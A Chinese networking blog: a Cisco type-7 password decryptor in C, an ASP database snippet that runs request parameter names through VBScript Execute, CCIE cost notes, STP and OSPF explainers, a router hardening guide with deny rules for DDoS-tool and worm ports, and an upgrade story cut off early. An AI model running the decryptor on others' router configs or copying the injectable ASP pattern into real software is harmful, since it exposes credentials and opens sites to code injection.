水土不服's blog - 思科技术

写asp程序的通用v代码

admin@ruery.com(Ruery) — Mon,01 Mar 2010 23:10:58 +0800

<%
Response.Buffer=True
On Error Resume Next

datafile ="data/aaa.mdb"
connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath(""&datafile&"")
Set conn=Server.CreateObject("ADODB.Connection")
conn.open ConnStr
If Err Then
err.Clear
Set Conn = Nothing
Response.Write "数据库连接出错，请检查连接字串。"
Response.End
End If
On Error GoTo 0

function checkstr(str)
str=replace(str,"'","‘")
str=replace(str,"""","“")
str=replace(str,";","；")
str=replace(str,"%","％")
str=replace(str,"from","Ｆrom")
str=replace(str,"and","Ａnd")
checkstr=str
end function

FOR Each item in Request.QueryString
Execute item & "=checkstr(Request.QueryString("""&item&"""))"
Next

FOR Each item in Request.Form
Execute item & "=checkstr(Request.Form("""&item&"""))"
Next
%>

Cisco Password 7方式的密码破解程序

admin@ruery.com(Ruery) — Sat,20 Dec 2008 01:12:58 +0800

/*
* * descambles cisco IOS type-7 passwords
* * found somewhere on the internet, slightly modified, anonymous@segfault.net
* *
* * gcc -Wall -o ciscocrack ciscocrack.c
* * ./ciscocrack 01178E05590909022A
* *
* */

#include
#include

char xlat[] = {
        0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,
        0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,
        0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44, 0x48, 0x53,
        0x55, 0x42
};

int
cdecrypt(char *enc_pw, char *dec_pw)
{
        unsigned int seed, i, val = 0;

        if(strlen(enc_pw) & 1)
                return(-1);

        seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';

        if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))
                return(-1);

        for (i = 2 ; i <= strlen(enc_pw); i++) {
                if(i !=2 && !(i & 1)) {
                        dec_pw[i / 2 - 2] = val ^ xlat[seed++];
                        val = 0;
                }

                val *= 16;

                if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {
                        val += enc_pw[i] - '0';
                        continue;
                }

                if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {
                        val += enc_pw[i] - 'A' + 10;
                        continue;
                }

                if(strlen(enc_pw) != i)
                        return(-1);
        }

        dec_pw[++i / 2] = 0;

        return(0);
}

void
usage()
{
        fprintf(stdout, "Usage: ciscocrack \n");
}

int
main(int argc, char *argv[])
{
    char passwd[65];

    memset(passwd, 0, sizeof(passwd));

    if(argc != 2)
    {
          usage();
          exit(1);
    }

    if(cdecrypt(argv[1], passwd)) {
          fprintf(stderr, "Error\n");
          exit(1);
    }
    printf("Passwd: %s\n", passwd);

    return 0;
}

各个方向CCIE认证投资回报分析

admin@ruery.com(Ruery) — Sun,07 Dec 2008 17:33:45 +0800

      OPENLAB提供全球最权威的4个方向的CCIE认证培训www.openlab.cn
       为了学员更好的了解和选择CCIE认证
       将投资回报计算如下，仅供参考:

R&S CCIE投资回报

       概述：Routing-switch 是整个CCIE体系中的基础部分,要求学员建立非常好的路由交换的概念,这部分内容也是学习其他CCIE课程的一个非常重要的基础内容.

1：学习投入（试验考试算2次通过）
  直通车培训费：14800
   考试费：笔试3150 试验10850
   学习投入总计：14800＋3150＋10850*2=39650
   备注：以上学习成本按保守估计（2次通过考试）

2:  就职方向
     考取R&S CCIE认证后您可以选择供职的单位一般有ISP, 原厂(比如CISCO,华为等), CISCO金银牌代理商,集成商,外企,大中型企事业单位.

3：投资回报
     如果按照取得认证后每个月6000月薪计算，保守估计7个月收回成本，并且随着您工程经验的累计.2年后达到12-15W.投资回报还是相当比较划算的.

Security CCIE投资回报

       概述：cisco目前在整个安全领域推行的安全自防御网络系统,在整个安全界处于非常领先的地位.本课程可以让你完全了解CISCO安全网络的体系和具体实施部署的方法.(包括VPN,防火墙,IPS等等)

1：学习投入（试验考试算2次通过）
          培训费：总共18800
          考试费：笔试3150 试验10850
          学习投入总计：18800＋3150＋10850*2=43650
          备注：以上学习成本按保守估计（2次通过考试）

2：就职方向
       考取安全CCIE后您可以就职的单位有网络安全厂商, 网络安全方面的集成商, CISCO金银牌代理商,外企.       金融系统(例如银行)

3：投资回报
       如果按照取得认证后每个月8000月薪计算，保守估计6个月收回成本，并且随着您的网络安全方面经验的增加. 后续成为安全顾问专家,年薪15-20W以上. 所以对网络安全感兴趣的同学选择Security ccie是个不错的发展方向.

SP CCIE投资回报

      概述：为运营商提供优质的产品和技术支持，一直是思科的核心盈利来源, 可以说，sp代表着思科技术的精髓，他是一个成熟的并有着丰富技术底蕴的领域

1：学习投入（试验考试算2次通过）
      培训费：总共14800
      考试费：笔试3150 试验10850
      学习投入总计：14800＋3150＋10850*2=39650
      备注：以上学习成本按保守估计（2次通过考试）

2：就职方向
      考取SP CCIE后主要就职单位各大ISP运营商, 原厂(CISCO,华为,JUNIPER等) CISCO金银牌代理商

3：投资回报
     如果按照取得认证后每个月8000月薪计算，保守估计5个月收回成本. 并且随着您在大网部署经验的增加,后续做到高级工程师年薪15-20W. 如果您想进入各大运营商.对大型网络的部署尤其是运营商网络的部署情有独钟.比如电信网络,那么您选择SP CCIE是最对口的专业.

Voice CCIE投资回报
      概述：思科统一通信，通过智能整合，达成通信工具间的无缝整合、协同交流，从而大幅提高沟通效率。Ip通信技术是下一步互联网发展的趋势,随着CISCO公司统一通信业务的开展, 需要更多的精通IP语音技术的高级人才.

1：学习投入（试验考试算2次通过）
      培训费：总共28800
      考试费：笔试3150 试验10850
      出国费用:二次 30000
      学习投入总计：28800＋3150＋10850*2+30000=83650
      备注：以上学习成本按保守估计（2次通过考试）

2：就职方向
     考取voice CCIE认证后,可以就职于原厂 (cisco,avaya等) , cisco金银牌代理商 ,500强外企等

3：投资回报
    如果按照取得认证后每个月12000月薪计算，保守估计7个月收回成本，并且随着您在这个行业经验的增加.成为IP通信的高级工程师,年薪20-30W.如果您想致力于IP通信技术的发展.那么voice CCIE是您唯一的选择.

STP：生成树协议－ IEEE 802.1D

admin@ruery.com(Ruery) — Thu,04 Dec 2008 15:59:09 +0800

生成树协议（Spanning Tree）定义在 IEEE 802.1D 中，是一种链路管理协议，它为网络提供路径冗余同时防止产生环路。为使以太网更好地工作，两个工作站之间只能有一条活动路径。网络环路的发生有多种原因，最常见的一种是有意生成的冗余－万一一个链路或交换机失败，会有另一个链路或交换机替代。

STP 允许网桥之间相互通信以发现网络物理环路。该协议定义了一种算法，网桥能够使用它创建无环路（loop-free）的逻辑拓朴结构。换句话说，STP 创建了一个由无环路树叶和树枝构成的树结构，其跨越了整个第二层网络。

生成树协议操作对终端站透明，也就是说，终端站并不知道它们自己是否连接在单个局域网段或多网段中。当有两个网桥同时连接相同的计算机网段时，生成树协议可以允许两网桥之间相互交换信息，这样只需要其中一个网桥处理两台计算机之间发送的信息。

网桥之间通过桥接协议数据单元（Bridge Protocol Data Unit － BPDU）交换各自状态信息。生成树协议通过发送 BPDU 信息选出网络中根交换机和根节点端口，并为每个网段（switched segment）选出根节点端口和指定端口。

网桥中的程序能够决定如何使用生成树协议，这称为生成树算法，该算法能够避免网桥环路，并确保在多路径情形下网桥能够选择一条最有效的路径。如果最佳路径失败，可以使用该算法重新计算网络路径并找出下一条最佳路径。

利用生成树算法可以决定网络（哪台计算机主机在哪个区段），并通过 BPDU 信息交换以上数据。该过程主要分为以下两个步骤：

步骤1：通过评估它所接收到的所有配置信息和选择最优选项，来决定一个网桥可发送的最佳信息。
步骤2：一旦选定某网桥发送的信息，网桥将该信息与来自无根（non-root）连接的可能配置信息相比较。如果步骤1中选择的最佳选项并不优于可能配置信息，便删除该端口。
协议结构

网桥协议数据单元（BPDU）：

Protocol ID (2) Version (1) Type (1) Flags (1) Rood ID (8) Root Path (4)
Sender BID (8) Port ID (2) M-Age (2) Max Age (2) Hello (2) FD (2 Bytes)

Protocol ID ― 恒为0。
Version ― 恒为0。
Type ― 决定该帧中所包含的两种 BPDU 格式类型（配置 BPDU 或 TCN BPDU）。
Flags ― 标志活动拓朴中的变化，包含在拓朴变化通知（Topology Change Notifications）的下一部分中。
Root BID ― 包括有根网桥的网桥 ID。会聚后的网桥网络中，所有配置 BPDU 中的该字段都应该具有相同值（单个 VLAN）。NetXRay 可以细分为两个 BID 子字段：网桥优先级和网桥 MAC 地址。
Root Path Cost ― 通向有根网桥（Root Bridge）的所有链路的积累资本。
Sender BID ― 创建当前 BPDU 的网桥 BID。对于单交换机（单个 VLAN）发送的所有 BPDU 而言，该字段值都相同，而对于交换机与交换机之间发送的 BPDU 而言，该字段值不同）
Port ID ― 每个端口值都是唯一的。端口1/1值为0×8001，而端口1/2 值为0×8002。
Message Age ― 记录 Root Bridge 生成当前 BPDU 起源信息的所消耗时间。
Max Age ― 保存 BPDU 的最长时间，也反映了拓朴变化通知（Topology Change Notification）过程中的网桥表生存时间情况。
Hello Time ― 指周期性配置 BPDU 间的时间。
Forward Delay ― 用于在 Listening 和 Learning 状态的时间，也反映了拓朴变化通知（Topology Change Notification）过程中的时间情况

相关协议：IEEE 802.2、802.3、802.1P、802.1Q

组织来源：STP 由 IEEE （http://www.ieee.org/）定义在 802.1D 中。

Cisco路由器安全配置方案

admin@ruery.com(Ruery) — Wed,03 Dec 2008 01:28:55 +0800

一、路由器网络服务安全配置
1 禁止CDP(Cisco Discovery Protocol)。如：
Router(Config)#no cdp run
Router(Config-if)# no cdp enable
2 禁止其他的TCP、UDP Small服务。
Router(Config)# no service tcp-small-servers
Router(Config)# no service udp-samll-servers
3 禁止Finger服务。
Router(Config)# no ip finger
Router(Config)# no service finger
4 建议禁止HTTP服务。
Router(Config)# no ip http server
如果启用了HTTP服务则需要对其进行安全配置：设置用户名和密码；采用访问列表进行控制。
5 禁止BOOTp服务。
Router(Config)# no ip bootp server
6 禁止IP Source Routing。
Router(Config)# no ip source-route
7 建议如果不需要ARP-Proxy服务则禁止它，路由器默认识开启的。
Router(Config)# no ip proxy-arp
Router(Config-if)# no ip proxy-arp
8禁止IP Directed Broadcast。
Router(Config)# no ip directed-broadcast
9 禁止IP Classless。
Router(Config)# no ip classless
10 禁止ICMP协议的IP Unreachables, Redirects, Mask Replies。
Router(Config-if)# no ip unreacheables
Router(Config-if)# no ip redirects
Router(Config-if)# no ip mask-reply
11 建议禁止SNMP协议服务。在禁止时必须删除一些SNMP服务的默认配置。如：
Router(Config)# no snmp-server community public Ro
Router(Config)# no snmp-server community admin RW
12 如果没必要则禁止WINS和DNS服务。
Router(Config)# no ip domain-lookup
如果需要则需要配置：
Router(Config)# hostname Router
Router(Config)# ip name-server 219.150.32.xxx
13 明确禁止不使用的端口。如：
Router(Config)# interface eth0/3
Router(Config)# shutdown

二、路由器访问控制的安全配置（可选）
路由器的访问控制是比较重要的安全措施，但是目前由于需求不明确，可以考虑暂时不实施。作为建议提供。
1 建议不要远程访问路由器。即使需要远程访问路由器，建议使用访问控制列表和高强度的密码控制。
2 严格控制CON端口的访问。
配合使用访问控制列表控制对CON口的访问。
如：Router(Config)#Access-list 1 permit 192.168.0.1
Router(Config)#line con 0
Router(Config-line)#Transport input none
Router(Config-line)#Login local
Router(Config-line)＃e xec-timeoute 5 0
Router(Config-line)#access-class 1 in
Router(Config-line)#end
同时给CON口设置高强度的密码。
3 如果不使用AUX端口，则禁止这个端口。默认是未被启用。禁止如：
Router(Config)#line aux 0
Router(Config-line)#transport input none
Router(Config-line)#no exec
4 建议采用权限分级策略。如：
Router(Config)#username test privilege 10 xxxx
Router(Config)#privilege EXEC level 10 telnet
Router(Config)#privilege EXEC level 10 show ip access-list
5 为特权模式的进入设置强壮的密码。不要采用enable password设置密码。而要采用enable secret命令设置。并且要启用Service password-encryption。
Router（config）#service password-encryption
Router（config）#enable secret
6 控制对VTY的访问。如果不需要远程访问则禁止它。如果需要则一定要设置强壮的密码。由于VTY在网络的传输过程中为加密，所以需要对其进行严格的控制。如：设置强壮的密码；控制连接的并发数目；采用访问列表严格控制访问的地址；可以采用AAA设置用户的访问控制等。

三、路由器路由协议安全配置
1 建议启用IP Unicast Reverse-Path Verification。它能够检查源IP地址的准确性，从而可以防止一定的IP Spooling。但是它只能在启用CEF(Cisco Express Forwarding)的路由器上使用。
uRPF有三种方式，strict方式、ACL方式和loose方式。在接入路由器上实施时，对于通过单链路接入网络的用户，建议采用strict方式；对于通过多条链路接入到网络的用户，可以采用ACL方式和loose方式。在出口路由器上实施时，采用loose方式。

Strict方式：
Router# config t
! 启用CEF
Router(Config)# ip cef
！启用Unicast Reverse-Path Verification
Router(Config)# interface eth0/1
Router(Config-if)# ip verify unicast reverse-path

ACL方式：
interface pos1/0
ip verify unicast reverse-path 190
access-list 190 permit ip {customer network} {customer network mask} any
access-list 190 deny ip any any [log]
这个功能检查每一个经过路由器的数据包的源地址，若是不符合ACL的，路由器将丢弃该数据包。

Loose方式：
interface pos 1/0
ip ver unicast source reachable-via any
这个功能检查每一个经过路由器的数据包，在路由器的路由表中若没有该数据包源IP地址的路由，路由器将丢弃该数据包。

2 启用OSPF路由协议的认证。默认的OSPF认证密码是明文传输的，建议启用MD5认证。并设置一定强度密钥(key,相对的路由器必须有相同的Key)。
3 RIP协议的认证。只有RIP-V2支持，RIP-1不支持。建议启用RIP-V2。并且采用MD5认证。普通认证同样是明文传输的。
4 启用passive-interface命令可以禁用一些不需要接收和转发路由信息的端口。建议对于不需要路由的端口，启用passive-interface。但是，在RIP协议是只是禁止转发路由信息，并没有禁止接收。在OSPF协议中是禁止转发和接收路由信息。
5 启用访问列表过滤一些垃圾和恶意路由信息,控制网络的垃圾信息流。如：
Router(Config)# access-list 10 deny 192.168.1.0 0.0.0.255
Router(Config)# access-list 10 permit any
! 禁止路由器接收更新192.168.1.0网络的路由信息
Router(Config)# router ospf 100
Router(Config-router)# distribute-list 10 in
！禁止路由器转发传播192.168.1.0网络的路由信息
Router(Config)# router ospf 100
Router(Config-router)# distribute-list 10 out

四、路由器其他安全配置
1 IP欺骗简单防护。如过滤非公有地址访问内部网络。过滤自己内部网络地址；回环地址(127.0.0.0/8)；RFC1918私有地址；DHCP自定义地址(169.254.0.0/16)；科学文档作者测试用地址(192.0.2.0/24)；不用的组播地址(224.0.0.0/4)；SUN公司的古老的测试地址(20.20.20.0/24;204.152.64.0/23)；全网络地址(0.0.0.0/8)。
Router(Config)# access-list 100 deny ip 127.0.0.0 0.255.255.255 any
Router(Config)# access-list 100 deny ip 192.168.0.0 0.0.255.255 any
Router(Config)# access-list 100 deny ip 172.16.0.0 0.15.255.255 any
Router(Config)# access-list 100 deny ip 10.0.0.0 0.255.255.255 any
Router(Config)# access-list 100 deny ip 169.254.0.0 0.0.255.255 any
Router(Config)# access-list 100 deny ip 192.0.2.0 0.0.0.255 any
Router(Config)# access-list 100 deny ip 224.0.0.0 15.255.255.255 any
Router(Config)# access-list 100 deny ip 20.20.20.0 0.0.0.255 any
Router(Config)# access-list 100 deny ip 204.152.64.0 0.0.2.255 any
Router(Config)# access-list 100 deny ip 0.0.0.0 0.255.255.255 any
Router(Config)# access-list 100 permit ip any any
Router(Config-if)# ip access-group 100 in

2 建议采用访问列表控制流出内部网络的地址必须是属于内部网络的。（可选）如：
Router(Config)# no access-list 101
Router(Config)# access-list 101 permit ip 192.168.0.0 0.0.255.255 any
Router(Config)# access-list 101 deny ip any any
Router(Config)# interface eth 0/1
Router(Config-if)# deion “internet Ethernet”
Router(Config-if)# ip address 192.168.0.254 255.255.255.0
Router(Config-if)# ip access-group 101 in

其他可选项：
1、建议启用SSH，废弃掉Telnet。但只有支持并带有IPSec特征集的IOS才支持SSH。并且IOS12.0-IOS12.2仅支持SSH-V1。如下配置SSH服务的例子：
Router(Config)# config t
Router(Config)# no access-list 22
Router(Config)# access-list 22 permit 192.168.0.22
Router(Config)# access-list deny any
Router(Config)# username test privilege 10 ****
! 设置SSH的超时间隔和尝试登录次数
Router(Config)# ip ssh timeout 90
Router(Config)# ip ssh anthentication-retries 2
Router(Config)# line vty 0 4
Router(Config-line)# access-class 22 in
Router(Config-line)# transport input ssh
Router(Config-line)# login local
Router(Config-line)# exit
！启用SSH服务，生成RSA密钥对。
Router(Config)# crypto key generate rsa
The name for the keys will be: router.xxx
Choose the size of the key modulus in the range of 360 to 2048 for your General Purpose Keys .Choosing a key modulus greater than 512 may take a few minutes.
How many bits in the modulus[512]: 2048
Generating RSA Keys...
[OK]
Router(Config)#

2、 TCP SYN的防范。如：
A: 通过访问列表防范。
Router(Config)# no access-list 106
Router(Config)# access-list 106 permit tcp any 192.168.0.0 0.0.0.255 established
Router(Config)# access-list 106 deny ip any any
Router(Config)# interface eth 0/2
Router(Config-if)# deion “external Ethernet”
Router(Config-if)# ip address 192.168.1.254 255.255.255.0
Router(Config-if)# ip access-group 106 in
B：通过TCP截取防范。(这会给路由器产生一定负载)
Router(Config)# ip tcp intercept list 107
Router(Config)# access-list 107 permit tcp any 192.168.0.0 0.0.0.255
Router(Config)# access-list 107 deny ip any any
Router(Config)# interface eth0
Router(Config)# ip access-group 107 in

3、 LAND.C 进攻的防范。
Router(Config)# access-list 107 deny ip host 192.168.1.254 host 192.168.1.254
Router(Config)# access-list 107 permit ip any any
Router(Config)# interface eth 0/2
Router(Config-if)# ip address 192.168.1.254 255.255.255.0
Router(Config-if)# ip access-group 107 in

4、 Smurf进攻的防范。
Router(Config)# access-list 108 deny ip any host 192.168.1.255
Router(Config)# access-list 108 deny ip any host 192.168.1.0
Router(Config)# access-list 108 permit ip any any
Router(Config-if)# ip access-group 108 in

5、 ICMP协议的安全配置。对于进入ICMP流，我们要禁止ICMP协议的ECHO、Redirect、Mask request。也需要禁止TraceRoute命令的探测。对于流出的ICMP流，我们可以允许ECHO、Parameter Problem、Packet too big。还有TraceRoute命令的使用。
! outbound ICMP Control
Router(Config)# access-list 110 deny icmp any any echo
Router(Config)# access-list 110 deny icmp any any redirect
Router(Config)# access-list 110 deny icmp any any mask-request
Router(Config)# access-list 110 permit icmp any any
! Inbound ICMP Control
Router(Config)# access-list 111 permit icmp any any echo
Router(Config)# access-list 111 permit icmp any any Parameter-problem
Router(Config)# access-list 111 permit icmp any any packet-too-big
Router(Config)# access-list 111 permit icmp any any source-quench
Router(Config)# access-list 111 deny icmp any any
! Outbound TraceRoute Control
Router(Config)# access-list 112 deny udp any any range 33400 34400
! Inbound TraceRoute Control
Router(Config)# access-list 112 permit udp any any range 33400 34400

6、 DDoS(Distributed Denial of Service)的防范。
! The TRINOO DDoS system
Router(Config)# access-list 113 deny tcp any any eq 27665
Router(Config)# access-list 113 deny udp any any eq 31335
Router(Config)# access-list 113 deny udp any any eq 27444
! The Stacheldtraht DDoS system
Router(Config)# access-list 113 deny tcp any any eq 16660
Router(Config)# access-list 113 deny tcp any any eq 65000
! The TrinityV3 System
Router(Config)# access-list 113 deny tcp any any eq 33270
Router(Config)# access-list 113 deny tcp any any eq 39168
! The SubSeven DDoS system and some Variants
Router(Config)# access-list 113 deny tcp any any range 6711 6712
Router(Config)# access-list 113 deny tcp any any eq 6776
Router(Config)# access-list 113 deny tcp any any eq 6669
Router(Config)# access-list 113 deny tcp any any eq 2222
Router(Config)# access-list 113 deny tcp any any eq 7000
Router(Config)# access-list 113 permit ip any any
Router(Config-if)# ip access-group 113 in

7、 Sql蠕虫的防范
Router(Config)# access-list 114 deny udp any any eq 1434
Router(Config)# access-list 114 permit ip any any
Router(Config-if)# ip access-group 114 in

8、减少BGP的收敛时间，保证黑客攻击后网络能尽快恢复。
建议增加如下配置：(需在所有运行BGP的路由器上增加)
1、在每个BGP互连的接口上，增加hold-queue 1500命令，将接口的hold-queue由默认的75增加到1500。在做此配置之前需要先检查板卡的内存，确保其free memory至少为20M。
2、增加以下有关TCP的配置，增强BGP的收敛性能。
ip tcp selective-ack
ip tcp mss 1460
ip tcp window-size 65535
ip tcp queuemax 50
ip tcp path-mtu-discovery
3、在GSR上，增加ip cef linecard ipc memory 10000命令，提高download FIB的速度。

9、启用CAR和系统日志等来增强（略）

其他注意事项：
1,及时的升级IOS软件，并且要迅速的为IOS安装补丁。
2,要严格认真的为IOS作安全备份。
3,要为路由器的配置文件作安全备份。
4,购买UPS设备，或者至少要有冗余电源。
5,要有完备的路由器的安全访问和维护记录日志。

OSPF路由协议概念解释和特性介绍

admin@ruery.com(Ruery) — Tue,02 Dec 2008 13:58:04 +0800

　前言：
　　本篇文档针对一些对OSPF路由协议有一定的感性熟悉的技术人员，提供一些基于OSPF报文格式的介绍，来达到了解OSPF路由协议的特性和特有的一些概念的了解。
　　
　　一．OSPF的特性：
　　快速收敛；
　　能够适应大型网络；
　　能够正确处理错误路由信息；
　　使用区域，能够减少单个路由器的CPU负担，构成结构化的网络；
　　支持无类路由，完全支持超网，可变长子网等无类特性；
　　支持多条路径负载均衡；
　　使用组播地址来进行信息互通，减少了非OSPF路由器的负载；
　　使用路由标签来表示来自外部区域的路由。
　　
　　二．Neighbor和Adjacency的定义：
　　Neighbor：
　　在网络中，OSPF路由器可以发送Hello报文来进行邻居寻找，当Hello报文中的几个字段的内容是互相一致的时候，相邻的OSPF路由器就会形成Neighbor关系。
　　Neighbor是保存在Neighbor表里，需要有Router ID和IP地址信息。
　　Router ID的确定：
　　1．选择IP地址最大的Loopback接口的IP地址为Router ID；假如只有一个Loopback接口，那么Router ID就是这个Loopback的地址。
　　2．假如没有Loopback接口，就选择IP地址最大的物理接口的IP地址为Router ID，但是作为Router ID的物理接口，就不能运行OSPF，也就是说这个接口无法发送接受OSPF报文。
　　使用Loopback的IP地址作为Router ID的好处：
　　a． Loopback接口是逻辑接口，永远不会down，有利于OSPF的稳定运行；
　　b．便于控制OSPF路由器的Router ID。
　　Hello协议的特点：
　　1．目的：
　　a．用来发现OSPF Neighbor；
　　b． Hello报文包含了多个需要OSPF路由器协商的参数，以形成Neighbor的关系；
　　c．他可以用来维持邻居之间链接的存活；
　　d．用来确定DR，BDR路由器的选择。
　　
　　2．报文内容：
　　a． Router ID
　　b． Area ID
　　c． IP地址和掩码
　　d．认证方式和认证信息
　　e． Hello Interval和Dead Interval
　　f． Router优先权
　　g． DR和BDR的Router ID
　　h．五个字节的特性控制信息
　　i．距上次Hello报文后，在Dead Interval中，路由器的Neighbor的Router ID列表
　　每个OSPF路由器收到收到hello报文，将会协商上述信息，是否符合，假如不符合，Hello报文会遭到丢弃。
　　并且当一个路由器收到一个Hello报文，其中Neighbor Router ID List里有它的Router ID时，就会进入2-way模式,一旦进入2-way模式，就会建立Adjacency。
　　3． DR和BDR使用224.0.0.5(ALLSPFRouter Address)发送Hello Packet，而收到报文的路由器以224.0.0.6(ALLDRRouter Address)发送确认报文，表示收到了Hello Packet。
　　4． Point-to-Multipoint:相当与多个点对点网络的集合，但是不会产生DR，BDR的选举，通过组播报文发送路由信息报文。
　　5．只有NBMA网络和采用虚拟链路的网络发送的是单播报文。
　　6． Stub Network：只有一个出口连接到路由器的网络，通常产生的报文的原地址和目的地址都是本网络中。
　　DR和BDR的选择，特性：
　　1． DR和BDR是接口的特性，和路由器本身无关。
　　2． DR和BDR和multiAccess网络中其他的路由器形成adjancency，但他们之间没有形成adjancency。
　　3．每个接口上都会有优先级，假如优先级为0时，表示不参加选择DR，BDR。
　　
　　Adjacency：
　　是在OSPF Neighbor之间形成的虚拟的连接，这些连接有不同的性质，根据路由器连接的不同网络类型。
　　形成Adjacency的步骤：
　　1．邻居发现
　　2．双向通信
　　3．数据库同步
　　为了使路由器能够实现数据库的一致和同步，通过交换DD，LSR，LSU报文来达到数据库同步的目的。
　　4．完全形成连接
　　
　　Master和Slave的关系和选择
　　在ExStart状态下，邻居之间进行协商，以决定由哪个路由器来控制Database sychronization。
　　Neighbor表项的数据结构：
　　Neighbor表项中的信息是通过路由器从Hello报文中学到的，关于邻居的一些信息。
　　1． Neighbor ID
　　2． Neighbor IP Address
　　3． Area ID
　　4． Interface
　　5． Neighbor Priority
　　6． State
　　7． PollInterval
　　这是用于NBMA网络的一个概念，由于NBMA网络无法用组播来发送报文，也就是说无法自动发现邻居，假如当Neighbor处于down的状态时候，Hello报文每隔一个PollInterval时间就会发送一次，来发现和维护邻居关系。
　　8． Neighbor Option
　　9． Inactivity Time
　　10． DR
　　11． BDR
　　12． Master/Slave
　　13． DD Sequence Number
　　14． Last Received Database Description Packet
　　15． Lik State Retransmission List
　　是指已经发送出去的LSA，但是还没有收到Acknowledge的报文，假如超过RxmtInterval还没有收到，就会进行重传。
　　16． Database Summary List
　　在database synchronization时，所发送的LSA的表单。
　　17． Link State Request List
　　是指最新收到的在Database Description报文中所带的LSA清单，

路由器会发送LSR到Neighbor要最新的LSA，收到LSU后，会把list里的相应条目删掉。
　　
　　三．Neighbor状态机制
　　1． Down
　　没有收到任何Hello报文的时候，或是在DeadInterval中，没有收到Hello报文
　　2． Attempt
　　只有在NBMA网络里才有，手工进行Neighbor的指定。
　　3． Init
　　收到了Hello报文
　　4． 2-way
　　当路由器看到自己的Router ID在邻居发来的Hello报文里；在广播网络里，DR和BDR开始被选举。
　　5． ExStart
　　决定Master/Slave关系，以初始化DD 报文序列号来交换Database Description报文
　　6． Exchange
　　路由器开始交换DD报文的过程
　　7． Loading
　　发送LSR报文已处在Loading状态的报文，请求最新的通过Exchange DD报文发现的未收到的LSA
　　8． Full
　　完成了路由器和网络的LSA的交换
　　当路由器收到LSA后，会把LSA存到数据库中，然后会把收到LSA复制并从其它的OSPF接口发送出去，直到整个网络区域的LSA Database获得同步一致。然后每个路由器根据LSA Database里的Link信息进行SPF运算，算出没有回路的最短路径。
　　
　　四．Database Description报文
　　它是包含了路由器所有的LSA信息的报头，可以使路由器知道，Neighbor上有多少LSA是自己不知道的，可以通过LSR报文来请求新的LSA。
　　五．多区域OSPF特性
　　1．骨干区域：起到了让其他非骨干区域能够知道别的区域的网络情况的作用。也就是说，所有非骨干区域的路由信息都要流经骨干区域。
　　
　　2．虚拟链路：是一个通过非骨干区域到骨干区域的链路。
　　使用目的：
　　连接一个非骨干区域到一个骨干区域通过一个非骨干区域
　　通过一个非骨干区，连接分开的两个骨干区部分
　　规则：
　　必须在两个ABR之间进行配置
　　虚链路通过的区域作为传输区域，必须有完整的路由信息
　　中间传输区不能是存根区
　　
　　六．区域的Link State报文类型：
　　1． Router LSA
　　由区域内所有的路由器产生的，并且只能在本个区域泛洪广播。
　　2． Network LSA
　　由区域内的DR或BDR路由器产生的，报文包括DR和BDR连接的路由器的链路信息。
　　3． Network Summary LSA
　　由ABR产生的，可以通知本区域内的路由器通往区域外的路由信息；同时可以发送通往相同自治区不同区域的默认路由；把本区域的路由发送到骨干区域，假如有两个到相同目的地的路径，只会把最低cost的路由发送出去；
　　4． ASBR Summary LSA
　　由ABR产生，但是它是一条主机路由，指向ASBR路由器地路由。
　　5． Autonomous System External LSA
　　由ASBR产生，它告诉相同自治区的路由器通往外自治区的路径。
　　6． NSSA External LSA
　　由ASBR产生，在NSSA区域中，当有一个路由器是ASBR时，不得不产生LSA 5报文，但是NSSA中不能有LSA 5报文，所有ASBR产生LSA 7报文，发给本区域的路由器。
　　
　　七．OSPF Over Demand Circuits
　　是应用于有交换虚电路的链路中，当链路在是空闲的时候，它不会有虚电路的连接，只有在链路上有通信量的时候，才会建立虚电路。而OSPF的Hello，LSA报文是要每隔一段时间要发送一次，而Demand Circuits提供了一种特性，在虚电路上只需要传一次Hello和LSA报文进行OSPF的邻居和数据库同步，接下来就不需要再发送以上这些报文，LSA也不会由于收不到Update报文而过期，邻居关系也不会Dead。这样可是减少链路的使用情况，节省了广域网链路的开支。
　　OSPF通过在LSA报文中设置一个DonotAge字节，来使两端得到协商，使收到的LSA永不过期。并且在LSA中加了一个标志位，DC bit,使其他路由器知道这个LSA具有Demand Circuit的特性，

使其他路由器不会认为这条路由过期。
　　
　　八．OSPF的配置（只有一些特点，比较常规的东西不讲了）
　　OSPF 具有DNS功能，可以使用路由器名来取代Router ID。
　　配置：
　　ip name-server 172.19.45.1
　　指定OSPF使用的DNS-SERVER的 IP地址
　　ip ospf name-lookup
　　使OSPF可以启用DNS功能
　　
　　OSPF针对接口有多个地址的解决方法：
　　1． OSPF只有当接口主地址启用了OSPF时候，才会对secondary IP address Network的路由信息进行处理。
　　2． OSPF把secondary IP address Network看作是Stub Network，没有别的OSPF邻居，并且不会送Hello报文，也不会和从地址网络形成链接。所以当secondary IP address Network上有连着一台路由器时，而又需要这两台路由器互通路由信息，可以考虑采用静态路由。
　　
　　Area 1 nssa no-summary no-redistribution命令使用在既是ABR又是ASBR上，可以让他所连接的NSSA区域中，只有Router LSA，没有其他的类型LSA，甚至LSA 7也没有，只有一条指向ABR的默认路由。
　　
　　Area 1 nssa no-redistribution default-information-originate命令可以使上述情况中，可以让LSA 3和4进入NSSA区域，但是LSA 5和LSA 7会被过滤掉。由于把no-summary去掉后，虽然可以使LSA 3和4可以进入NSSA区域，但是ABR就不能产生一个指向外面网络的默认路由，使NSSA区域内的路由器和自治区外的路由隔离。使用default-information-originate参数，可以使ABR产生一个默认路由。
　　
　　在OSPF上配置地址汇总时，最好在ABR上增加一条指向null0口的默认路由，防止路由回环。

升级交换机IOS引发的网络故障

admin@ruery.com(Ruery) — Fri,28 Nov 2008 23:27:03 +0800

单位前几天新买了一台思科的Catalyst 6509交换机，配了WS-X6548-GE-TX这个思科在去年四月才新推出的10兆、100兆、1000兆自适应的48口RJ-45交换模块。由于思科的软件推出总是滞后于硬件，所以拿到手的Catalyst 6509交换机标准配置的12.2(14)SX1版本的IOS并不能支持该模块。于是找来支持WS-X6548-GE-TX模块的新版本的IOS准备升级。结果问题也就接二连三的来了。

问题一：没有RJ-45接口

